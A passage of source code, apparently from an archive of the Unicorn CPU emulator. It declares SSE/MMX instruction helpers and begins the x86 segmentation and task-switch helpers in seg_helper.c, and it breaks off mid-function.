void, env, Reg, Reg) #if SHIFT == 1 DEF_HELPER_3(glue(psrldq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pslldq, SUFFIX), void, env, Reg, Reg) #endif #define SSE_HELPER_B(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_W(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_L(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) #define SSE_HELPER_Q(name, F)\ DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) SSE_HELPER_B(paddb, FADD) SSE_HELPER_W(paddw, FADD) SSE_HELPER_L(paddl, FADD) SSE_HELPER_Q(paddq, FADD) SSE_HELPER_B(psubb, FSUB) SSE_HELPER_W(psubw, FSUB) SSE_HELPER_L(psubl, FSUB) SSE_HELPER_Q(psubq, FSUB) SSE_HELPER_B(paddusb, FADDUB) SSE_HELPER_B(paddsb, FADDSB) SSE_HELPER_B(psubusb, FSUBUB) SSE_HELPER_B(psubsb, FSUBSB) SSE_HELPER_W(paddusw, FADDUW) SSE_HELPER_W(paddsw, FADDSW) SSE_HELPER_W(psubusw, FSUBUW) SSE_HELPER_W(psubsw, FSUBSW) SSE_HELPER_B(pminub, FMINUB) SSE_HELPER_B(pmaxub, FMAXUB) SSE_HELPER_W(pminsw, FMINSW) SSE_HELPER_W(pmaxsw, FMAXSW) SSE_HELPER_Q(pand, FAND) SSE_HELPER_Q(pandn, FANDN) SSE_HELPER_Q(por, FOR) SSE_HELPER_Q(pxor, FXOR) SSE_HELPER_B(pcmpgtb, FCMPGTB) SSE_HELPER_W(pcmpgtw, FCMPGTW) SSE_HELPER_L(pcmpgtl, FCMPGTL) SSE_HELPER_B(pcmpeqb, FCMPEQ) SSE_HELPER_W(pcmpeqw, FCMPEQ) SSE_HELPER_L(pcmpeql, FCMPEQ) SSE_HELPER_W(pmullw, FMULLW) #if SHIFT == 0 SSE_HELPER_W(pmulhrw, FMULHRW) #endif SSE_HELPER_W(pmulhuw, FMULHUW) SSE_HELPER_W(pmulhw, FMULHW) SSE_HELPER_B(pavgb, FAVG) SSE_HELPER_W(pavgw, FAVG) DEF_HELPER_3(glue(pmuludq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaddwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psadbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(maskmov, SUFFIX), void, env, Reg, Reg, tl) DEF_HELPER_2(glue(movl_mm_T0, SUFFIX), void, Reg, i32) #ifdef TARGET_X86_64 DEF_HELPER_2(glue(movq_mm_T0, SUFFIX), void, Reg, i64) #endif #if SHIFT == 0 DEF_HELPER_3(glue(pshufw, SUFFIX), void, Reg, Reg, int) #else DEF_HELPER_3(shufps, void, Reg, Reg, int) DEF_HELPER_3(shufpd, void, Reg, Reg, int) DEF_HELPER_3(glue(pshufd, SUFFIX), void, Reg, Reg, int) DEF_HELPER_3(glue(pshuflw, SUFFIX), void, Reg, Reg, int) DEF_HELPER_3(glue(pshufhw, SUFFIX), void, Reg, Reg, int) #endif #if SHIFT == 1 /* FPU ops */ /* XXX: not accurate */ #define SSE_HELPER_S(name, F) \ DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ DEF_HELPER_3(name ## sd, void, env, Reg, Reg) SSE_HELPER_S(add, FPU_ADD) SSE_HELPER_S(sub, FPU_SUB) SSE_HELPER_S(mul, FPU_MUL) SSE_HELPER_S(div, FPU_DIV) SSE_HELPER_S(min, FPU_MIN) SSE_HELPER_S(max, FPU_MAX) SSE_HELPER_S(sqrt, FPU_SQRT) DEF_HELPER_3(cvtps2pd, void, env, Reg, Reg) DEF_HELPER_3(cvtpd2ps, void, env, Reg, Reg) DEF_HELPER_3(cvtss2sd, void, env, Reg, Reg) DEF_HELPER_3(cvtsd2ss, void, env, Reg, Reg) DEF_HELPER_3(cvtdq2ps, void, env, Reg, Reg) DEF_HELPER_3(cvtdq2pd, void, env, Reg, Reg) DEF_HELPER_3(cvtpi2ps, void, env, ZMMReg, MMXReg) DEF_HELPER_3(cvtpi2pd, void, env, ZMMReg, MMXReg) DEF_HELPER_3(cvtsi2ss, void, env, ZMMReg, i32) DEF_HELPER_3(cvtsi2sd, void, env, ZMMReg, i32) #ifdef TARGET_X86_64 DEF_HELPER_3(cvtsq2ss, void, env, ZMMReg, i64) DEF_HELPER_3(cvtsq2sd, void, env, ZMMReg, i64) #endif DEF_HELPER_3(cvtps2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvtpd2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvtps2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_3(cvtpd2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_2(cvtss2si, s32, env, ZMMReg) DEF_HELPER_2(cvtsd2si, s32, env, ZMMReg) #ifdef TARGET_X86_64 DEF_HELPER_2(cvtss2sq, s64, env, ZMMReg) DEF_HELPER_2(cvtsd2sq, s64, env, ZMMReg) #endif DEF_HELPER_3(cvttps2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvttpd2dq, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(cvttps2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_3(cvttpd2pi, void, env, MMXReg, ZMMReg) DEF_HELPER_2(cvttss2si, s32, env, ZMMReg) DEF_HELPER_2(cvttsd2si, s32, env, ZMMReg) #ifdef TARGET_X86_64 DEF_HELPER_2(cvttss2sq, s64, env, ZMMReg) DEF_HELPER_2(cvttsd2sq, s64, env, ZMMReg) #endif DEF_HELPER_3(rsqrtps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rsqrtss, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rcpps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(rcpss, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(extrq_r, void, env, ZMMReg, ZMMReg) DEF_HELPER_4(extrq_i, void, env, ZMMReg, int, int) DEF_HELPER_3(insertq_r, void, env, ZMMReg, ZMMReg) DEF_HELPER_4(insertq_i, void, env, ZMMReg, int, int) DEF_HELPER_3(haddps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(haddpd, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(hsubps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(hsubpd, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(addsubps, void, env, ZMMReg, ZMMReg) DEF_HELPER_3(addsubpd, void, env, ZMMReg, ZMMReg) #define SSE_HELPER_CMP(name, F) \ DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ DEF_HELPER_3(name ## sd, void, env, Reg, Reg) SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) SSE_HELPER_CMP(cmplt, FPU_CMPLT) SSE_HELPER_CMP(cmple, FPU_CMPLE) SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) SSE_HELPER_CMP(cmpord, FPU_CMPORD) DEF_HELPER_3(ucomiss, void, env, Reg, Reg) DEF_HELPER_3(comiss, void, env, Reg, Reg) DEF_HELPER_3(ucomisd, void, env, Reg, Reg) DEF_HELPER_3(comisd, void, env, Reg, Reg) DEF_HELPER_2(movmskps, i32, env, Reg) DEF_HELPER_2(movmskpd, i32, env, Reg) #endif DEF_HELPER_2(glue(pmovmskb, SUFFIX), i32, env, Reg) DEF_HELPER_3(glue(packsswb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packuswb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packssdw, SUFFIX), void, env, Reg, Reg) #define UNPCK_OP(base_name, base) \ DEF_HELPER_3(glue(punpck ## base_name ## bw, SUFFIX), void, env, Reg, Reg) \ DEF_HELPER_3(glue(punpck ## base_name ## wd, SUFFIX), void, env, Reg, Reg) \ DEF_HELPER_3(glue(punpck ## base_name ## dq, SUFFIX), void, env, Reg, Reg) UNPCK_OP(l, 0) UNPCK_OP(h, 1) #if SHIFT == 1 DEF_HELPER_3(glue(punpcklqdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(punpckhqdq, SUFFIX), void, env, Reg, Reg) #endif /* 3DNow! float ops */ #if SHIFT == 0 DEF_HELPER_3(pi2fd, void, env, MMXReg, MMXReg) DEF_HELPER_3(pi2fw, void, env, MMXReg, MMXReg) DEF_HELPER_3(pf2id, void, env, MMXReg, MMXReg) DEF_HELPER_3(pf2iw, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfadd, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpeq, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpge, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfcmpgt, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmax, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmin, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfmul, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfnacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfpnacc, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfrcp, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfrsqrt, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfsub, void, env, MMXReg, MMXReg) DEF_HELPER_3(pfsubr, void, env, MMXReg, MMXReg) DEF_HELPER_3(pswapd, void, env, MMXReg, MMXReg) #endif /* SSSE3 op helpers */ DEF_HELPER_3(glue(phaddw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phaddd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phaddsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phsubsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pabsd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaddubsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmulhrsw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pshufb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(psignd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(palignr, SUFFIX), void, env, Reg, Reg, s32) /* SSE4.1 op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(pblendvb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(blendvps, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(blendvpd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(ptest, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxbq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxwq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovsxdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxbq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxwd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxwq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmovzxdq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmuldq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pcmpeqq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(packusdw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminsd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pminud, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxsb, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxsd, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmaxud, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(pmulld, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(phminposuw, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(roundps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundpd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundss, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(roundsd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(blendps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(blendpd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pblendw, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(dpps, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(dppd, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(mpsadbw, SUFFIX), void, env, Reg, Reg, i32) #endif /* SSE4.2 op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(pcmpgtq, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(pcmpestri, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpestrm, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpistri, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pcmpistrm, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_3(crc32, tl, i32, tl, i32) #endif /* AES-NI op helpers */ #if SHIFT == 1 DEF_HELPER_3(glue(aesdec, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesdeclast, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesenc, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesenclast, SUFFIX), void, env, Reg, Reg) DEF_HELPER_3(glue(aesimc, SUFFIX), void, env, Reg, Reg) DEF_HELPER_4(glue(aeskeygenassist, SUFFIX), void, env, Reg, Reg, i32) DEF_HELPER_4(glue(pclmulqdq, SUFFIX), void, env, Reg, Reg, i32) #endif #undef SHIFT #undef Reg #undef SUFFIX #undef SSE_HELPER_B #undef SSE_HELPER_W #undef SSE_HELPER_L #undef SSE_HELPER_Q #undef SSE_HELPER_S #undef SSE_HELPER_CMP #undef UNPCK_OP ������������������������������������������������unicorn-2.1.1/qemu/target/i386/seg_helper.c���������������������������������������������������������0000664�0000000�0000000�00000262012�14675241067�0020416�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * x86 segmentation related helpers: * TSS, interrupts, system calls, jumps and call/task gates, descriptors * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/log.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "uc_priv.h" #include <unicorn/unicorn.h> //#define DEBUG_PCALL #ifdef DEBUG_PCALL # define LOG_PCALL(...) qemu_log_mask(CPU_LOG_PCALL, ## __VA_ARGS__) # define LOG_PCALL_STATE(cpu) \ log_cpu_state_mask(CPU_LOG_PCALL, (cpu), CPU_DUMP_CCOP) #else # define LOG_PCALL(...) do { } while (0) # define LOG_PCALL_STATE(cpu) do { } while (0) #endif /* * TODO: Convert callers to compute cpu_mmu_index_kernel once * and use *_mmuidx_ra directly. */ #define cpu_ldub_kernel_ra(e, p, r) \ cpu_ldub_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_lduw_kernel_ra(e, p, r) \ cpu_lduw_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_ldl_kernel_ra(e, p, r) \ cpu_ldl_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_ldq_kernel_ra(e, p, r) \ cpu_ldq_mmuidx_ra(e, p, cpu_mmu_index_kernel(e), r) #define cpu_stb_kernel_ra(e, p, v, r) \ cpu_stb_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stw_kernel_ra(e, p, v, r) \ cpu_stw_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stl_kernel_ra(e, p, v, r) \ cpu_stl_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_stq_kernel_ra(e, p, v, r) \ cpu_stq_mmuidx_ra(e, p, v, cpu_mmu_index_kernel(e), r) #define cpu_ldub_kernel(e, p) cpu_ldub_kernel_ra(e, p, 0) #define cpu_lduw_kernel(e, p) cpu_lduw_kernel_ra(e, p, 0) #define cpu_ldl_kernel(e, p) cpu_ldl_kernel_ra(e, p, 0) #define cpu_ldq_kernel(e, p) cpu_ldq_kernel_ra(e, p, 0) #define cpu_stb_kernel(e, p, v) cpu_stb_kernel_ra(e, p, v, 0) #define cpu_stw_kernel(e, p, v) cpu_stw_kernel_ra(e, p, v, 0) #define cpu_stl_kernel(e, p, v) cpu_stl_kernel_ra(e, p, v, 0) #define cpu_stq_kernel(e, p, v) cpu_stq_kernel_ra(e, p, v, 0) /* return non zero if error */ static inline int load_segment_ra(CPUX86State *env, uint32_t *e1_ptr, uint32_t *e2_ptr, int selector, uintptr_t retaddr) { SegmentCache *dt; int index; target_ulong ptr; if (selector & 0x4) { dt = &env->ldt; } else { dt = &env->gdt; } index = selector & ~7; if ((index + 7) > dt->limit) { return -1; } ptr = dt->base + index; *e1_ptr = cpu_ldl_kernel_ra(env, ptr, retaddr); *e2_ptr = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); return 0; } static inline int load_segment(CPUX86State *env, uint32_t *e1_ptr, uint32_t *e2_ptr, int selector) { return load_segment_ra(env, e1_ptr, e2_ptr, selector, 0); } static inline unsigned int get_seg_limit(uint32_t e1, uint32_t e2) { unsigned int limit; limit = (e1 & 0xffff) | (e2 & 0x000f0000); if (e2 & DESC_G_MASK) { limit = (limit << 12) | 0xfff; } return limit; } static inline uint32_t get_seg_base(uint32_t e1, uint32_t e2) { return (e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000); } static inline void load_seg_cache_raw_dt(SegmentCache *sc, uint32_t e1, uint32_t e2) { sc->base = get_seg_base(e1, e2); sc->limit = get_seg_limit(e1, e2); sc->flags = e2; } /* init the segment cache in vm86 mode. */ static inline void load_seg_vm(CPUX86State *env, int seg, int selector) { selector &= 0xffff; cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | DESC_A_MASK | (3 << DESC_DPL_SHIFT)); } static inline void get_ss_esp_from_tss(CPUX86State *env, uint32_t *ss_ptr, uint32_t *esp_ptr, int dpl, uintptr_t retaddr) { X86CPU *cpu = env_archcpu(env); int type, index, shift; #if 0 { int i; printf("TR: base=%p limit=%x\n", env->tr.base, env->tr.limit); for (i = 0; i < env->tr.limit; i++) { printf("%02x ", env->tr.base[i]); if ((i & 7) == 7) { printf("\n"); } } printf("\n"); } #endif if (!(env->tr.flags & DESC_P_MASK)) { cpu_abort(CPU(cpu), "invalid tss"); } type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; if ((type & 7) != 1) { cpu_abort(CPU(cpu), "invalid tss type"); } shift = type >> 3; index = (dpl * 4 + 2) << shift; if (index + (4 << shift) - 1 > env->tr.limit) { raise_exception_err_ra(env, EXCP0A_TSS, env->tr.selector & 0xfffc, retaddr); } if (shift == 0) { *esp_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index, retaddr); *ss_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index + 2, retaddr); } else { *esp_ptr = cpu_ldl_kernel_ra(env, env->tr.base + index, retaddr); *ss_ptr = cpu_lduw_kernel_ra(env, env->tr.base + index + 4, retaddr); } } static void tss_load_seg(CPUX86State *env, int seg_reg, int selector, int cpl, uintptr_t retaddr) { uint32_t e1, e2; int rpl, dpl; if ((selector & 0xfffc) != 0) { if (load_segment_ra(env, &e1, &e2, selector, retaddr) != 0) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (!(e2 & DESC_S_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } rpl = selector & 3; dpl = (e2 >> DESC_DPL_SHIFT) & 3; if (seg_reg == R_CS) { if (!(e2 & DESC_CS_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (dpl != rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } else if (seg_reg == R_SS) { /* SS must be writable data */ if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } if (dpl != cpl || dpl != rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } else { /* not readable code */ if ((e2 & DESC_CS_MASK) && !(e2 & DESC_R_MASK)) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } /* if data or non conforming code, checks the rights */ if (((e2 >> DESC_TYPE_SHIFT) & 0xf) < 12) { if (dpl < cpl || dpl < rpl) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, selector & 0xfffc, retaddr); } cpu_x86_load_seg_cache(env, seg_reg, selector, get_seg_base(e1, e2), get_seg_limit(e1, e2), e2); } else { if (seg_reg == R_SS || seg_reg == R_CS) { raise_exception_err_ra(env, EXCP0A_TSS, selector & 0xfffc, retaddr); } } } #define SWITCH_TSS_JMP 0 #define SWITCH_TSS_IRET 1 #define SWITCH_TSS_CALL 2 /* XXX: restore CPU state in registers (PowerPC case) */ static void switch_tss_ra(CPUX86State *env, int tss_selector, uint32_t e1, uint32_t e2, int source, uint32_t next_eip, uintptr_t retaddr) { int tss_limit, tss_limit_max, type, old_tss_limit_max, old_type, v1, v2, i; target_ulong tss_base; uint32_t new_regs[8], new_segs[6]; uint32_t new_eflags, new_eip, new_cr3, new_ldt, new_trap; uint32_t old_eflags, eflags_mask; SegmentCache *dt; int index; target_ulong ptr; type = (e2 >> DESC_TYPE_SHIFT) & 0xf; LOG_PCALL("switch_tss: sel=0x%04x type=%d src=%d\n", tss_selector, type, source); /* if task gate, we read the TSS segment and we load it */ if (type == 5) { if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, tss_selector & 0xfffc, retaddr); } tss_selector = e1 >> 16; if (tss_selector & 4) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, retaddr); } if (load_segment_ra(env, &e1, &e2, tss_selector, retaddr) != 0) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } if (e2 & DESC_S_MASK) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } type = (e2 >> DESC_TYPE_SHIFT) & 0xf; if ((type & 7) != 1) { raise_exception_err_ra(env, EXCP0D_GPF, tss_selector & 0xfffc, retaddr); } } if (!(e2 & DESC_P_MASK)) { raise_exception_err_ra(env, EXCP0B_NOSEG, tss_selector & 0xfffc, retaddr); } if (type & 8) { tss_limit_max = 103; } else { tss_limit_max = 43; } tss_limit = get_seg_limit(e1, e2); tss_base = get_seg_base(e1, e2); if ((tss_selector & 4) != 0 || tss_limit < tss_limit_max) { raise_exception_err_ra(env, EXCP0A_TSS, tss_selector & 0xfffc, retaddr); } old_type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; if (old_type & 8) { old_tss_limit_max = 103; } else { old_tss_limit_max = 43; } /* read all the registers from the new TSS */ if (type & 8) { /* 32 bit */ new_cr3 = cpu_ldl_kernel_ra(env, tss_base + 0x1c, retaddr); new_eip = cpu_ldl_kernel_ra(env, tss_base + 0x20, retaddr); new_eflags = cpu_ldl_kernel_ra(env, tss_base + 0x24, retaddr); for (i = 0; i < 8; i++) { new_regs[i] = cpu_ldl_kernel_ra(env, tss_base + (0x28 + i * 4), retaddr); } for (i = 0; i < 6; i++) { new_segs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x48 + i * 4), retaddr); } new_ldt = cpu_lduw_kernel_ra(env, tss_base + 0x60, retaddr); new_trap = cpu_ldl_kernel_ra(env, tss_base + 0x64, retaddr); } else { /* 16 bit */ new_cr3 = 0; new_eip = cpu_lduw_kernel_ra(env, tss_base + 0x0e, retaddr); new_eflags = cpu_lduw_kernel_ra(env, tss_base + 0x10, retaddr); for (i = 0; i < 8; i++) { new_regs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x12 + i * 2), retaddr) | 0xffff0000; } for (i = 0; i < 4; i++) { new_segs[i] = cpu_lduw_kernel_ra(env, tss_base + (0x22 + i * 4), retaddr); } new_ldt = cpu_lduw_kernel_ra(env, tss_base + 0x2a, retaddr); new_segs[R_FS] = 0; new_segs[R_GS] = 0; new_trap = 0; } /* XXX: avoid a compiler warning, see http://support.amd.com/us/Processor_TechDocs/24593.pdf chapters 12.2.5 and 13.2.4 on how to implement TSS Trap bit */ (void)new_trap; /* NOTE: we must avoid memory exceptions during the task switch, so we make dummy accesses before */ /* XXX: it can still fail in some cases, so a bigger hack is necessary to valid the TLB after having done the accesses */ v1 = cpu_ldub_kernel_ra(env, env->tr.base, retaddr); v2 = cpu_ldub_kernel_ra(env, env->tr.base + old_tss_limit_max, retaddr); cpu_stb_kernel_ra(env, env->tr.base, v1, retaddr); cpu_stb_kernel_ra(env, env->tr.base + old_tss_limit_max, v2, retaddr); /* clear busy bit (it is restartable) */ if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_IRET) { target_ulong ptr; uint32_t e2; ptr = env->gdt.base + (env->tr.selector & ~7); e2 = cpu_ldl_kernel_ra(env, ptr + 4, retaddr); e2 &= ~DESC_TSS_BUSY_MASK; cpu_stl_kernel_ra(env, ptr + 4, e2, retaddr); } old_eflags = cpu_compute_eflags(env); if (source == SWITCH_TSS_IRET) { old_eflags &= ~NT_MASK; } /* save the current state in the old TSS */ if (type & 8) { /* 32 bit */ cpu_stl_kernel_ra(env, env->tr.base + 0x20, next_eip, retaddr); cpu_stl_kernel_ra(env, env->tr.base + 0x24, old_eflags, retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 0 * 4), env->regs[R_EAX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 1 * 4), env->regs[R_ECX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 2 * 4), env->regs[R_EDX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 3 * 4), env->regs[R_EBX], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 4 * 4), env->regs[R_ESP], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 5 * 4), env->regs[R_EBP], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 6 * 4), env->regs[R_ESI], retaddr); cpu_stl_kernel_ra(env, env->tr.base + (0x28 + 7 * 4), env->regs[R_EDI], retaddr); for (i = 0; i < 6; i++) { cpu_stw_kernel_ra(env, env->tr.base + (0x48 + i * 4), env->segs[i].selector, retaddr); } } else { /* 16 bit */ cpu_stw_kernel_ra(env, env->tr.base + 0x0e, next_eip, retaddr); cpu_stw_kernel_ra(env, env->tr.base + 0x10, old_eflags, retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 0 * 2), env->regs[R_EAX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 1 * 2), env->regs[R_ECX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 2 * 2), env->regs[R_EDX], retaddr); cpu_stw_kernel_ra(env, env->tr.base + (0x12 + 3 * 2), 